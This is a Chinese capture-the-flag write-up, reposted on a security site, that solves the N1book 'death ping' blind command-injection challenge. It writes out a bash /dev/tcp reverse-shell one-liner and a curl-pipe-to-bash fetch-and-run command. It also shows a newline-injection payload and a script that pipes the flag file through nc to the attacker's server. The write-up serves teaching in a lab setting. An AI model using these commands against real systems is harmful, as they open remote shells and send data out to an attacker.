N1book--死亡ping命令

admin 2022年11月11日18:52:29SecIN安全技术社区N1book--死亡ping命令已关闭评论91 views745字阅读2分29秒阅读模式

文章源自于:http://vfree.ltd

N1book---死亡ping命令

有时候命令执行的题目限制了字数或者某些函数被禁用了,那么此时可以用反弹shell的效果,连接题目的机器

一般来说,构造bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxxx 0>&1的方式,发送到客户端执行,但是有时候不一定可以,可能会报错啥的,所以此时可以在只记得vps中,新建一个页面,比如xxx.xxx.xxx.xxx/bash.php中的内容是bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxxx 0>&1,然后再题目处输出/?cmd=curl xxx.xxx.xxx.xxx/bash.php|bash 即可达到执行的效果

[第二章 web进阶]死亡ping命令

给出了一个ping的界面,能输出的内容就只是有ping成功/ping失败,也就是说这道题类似于于那种布尔命令执行,如果执行成功,会返回ping成功,反之ping失败

N1book--死亡ping命令

经过fuzz,可以排除大量的被过滤字符,其中%0a没有被过滤,因此,使用%0a再ip地址后面构造payload,由于docker里边没有bash,而且bash也被过滤了,所以用其他方式进行反弹

N1book--死亡ping命令

由于不会输出命令执行的内容,所以,此时最好的办法就是反弹一个shell,首先得有一台vbs,再vbs中开放80端口,然后再根目录下创建一个bash.sh,内容为

sh
cat /FLAG | nc ip port

构造了一个sh的文件,内容就是查看flag文件,并返回给自己的vps

N1book--死亡ping命令

由于很多文件夹都写不进去,唯独/tmp的文件夹可以写进去,所以索性写进tmp文件夹中,名字为bash1.sh

赋予权限

N1book--死亡ping命令

执行(执行前,记得在自己的vps主机打开nc,nc -lvp 12345)

N1book--死亡ping命令

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月11日18:52:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  N1book--死亡ping命令 http://cn-sec.com/archives/752215.html